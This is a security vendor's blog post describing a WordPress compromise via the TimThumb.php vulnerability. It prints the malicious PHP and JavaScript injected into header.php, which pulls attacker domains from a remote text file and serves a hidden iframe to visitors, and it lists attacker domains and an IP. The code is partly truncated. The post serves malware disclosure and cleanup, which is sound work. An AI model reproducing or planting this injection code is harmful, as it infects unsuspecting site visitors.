TimThumb.php attacks – Now using googlesafebrowsing dot com

We have been talking a lot lately about the Timthumb.php vulnerability and the importance of updating the script as soon as possible. Sites that didn’t update it are getting compromised very easily. We explained it in more detail here: Mass infection of WordPress sites because of TimThumb.php.

What we are seeing now is a small modification to the attack method. Instead of modifying the .htaccess or infecting the jquery.js or l10n.js scripts within WordPress core, they are modifying the header.php of the compromised WordPress site with this code:

<!– Wordpress Counter –>
<?php
if ( !is_user_logged_in() && !isset ( $_COOKIE['MTPT'] ) ) {

if ( get_option ( ‘domain_update’ ) === FALSE && ( $newdomain = ..
add_option ( ‘domain’, $newdomain, ”, ‘no’ );
add_option ( ‘domain_update’, time (), ”, ‘no’ );
}
if ( time () - get_option ( ‘domain_update’ ) > 10*60 && ( $newdomain =..
update_option ( ‘domain’, $newdomain );
update_option ( ‘domain_update’, time () );
}

$domain = get_option ( ‘domain’ );
if ($domain)
echo 
‘<script language="javascript">
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + (7 * 24 * 60 * 60));
SetCookie("MTPT","1",ExpDate, "/");

function SetCookie (name, value) {
 var argv = SetCookie.arguments;
 var argc = SetCookie.arguments.length;
 var expires = (argc > 2) ? argv[2] : null;
 var path = (argc > 3) ? argv[3] : null;
 var domain = (argc > 4) ? argv[4] : null;
 var secure = (argc > 5) ? argv[5] : false;
 document.cookie = name + "=" + escape (value) +
 ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
 ((path == null) ? "" : ("; path=" + path)) +
 ((domain == null) ? "" : ("; domain=" + domain)) +
 ((secure == true) ? "; secure" : "");
}
</script>
<iframe src="http://’ . $domain . ‘/kwizhveo.php" width="1" height="1" 
</iframe>’;
}

function get_new_domain () {
$url = ‘http://googlesafebrowsing.com/remoted.cc.txt’;
if ( function_exists ( ‘curl_init’ ) ) {
$ch = @curl_init ( $url );
@curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, TRUE );
$doms = @curl_exec ( $ch );
@curl_close ( $ch );

else 
$doms = @file_get_contents ( $url );

if ( strpos ( $doms, ‘||’ ) === false )
   return false;

$domains = explode ( ‘||’, trim ( $doms ) );
return $domains[array_rand ( $domains )];
}
?>

<!– Wordpress Counter –>

What this code does it very simple. It connects to http://googlesafebrowsing.com/remoted.cc.txt and extracts a domain to be used to hide a malicious iframe in attempt to infect everyone visiting the site:

blaackhatt58.us.to/kwizhveo.php
heidiheernande.us.to/kwizhveo.php
gufmaurr79.us.to/kwizhveo.php
(and many others)

All the domains are hosted at 85.17.19.165 and in the .us.to top level domain. If your site is compromised, you can scan it here: http://sitecheck.sucuri.net.

If you need help cleaning up up, sign up here: http://sucuri.net/signup

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.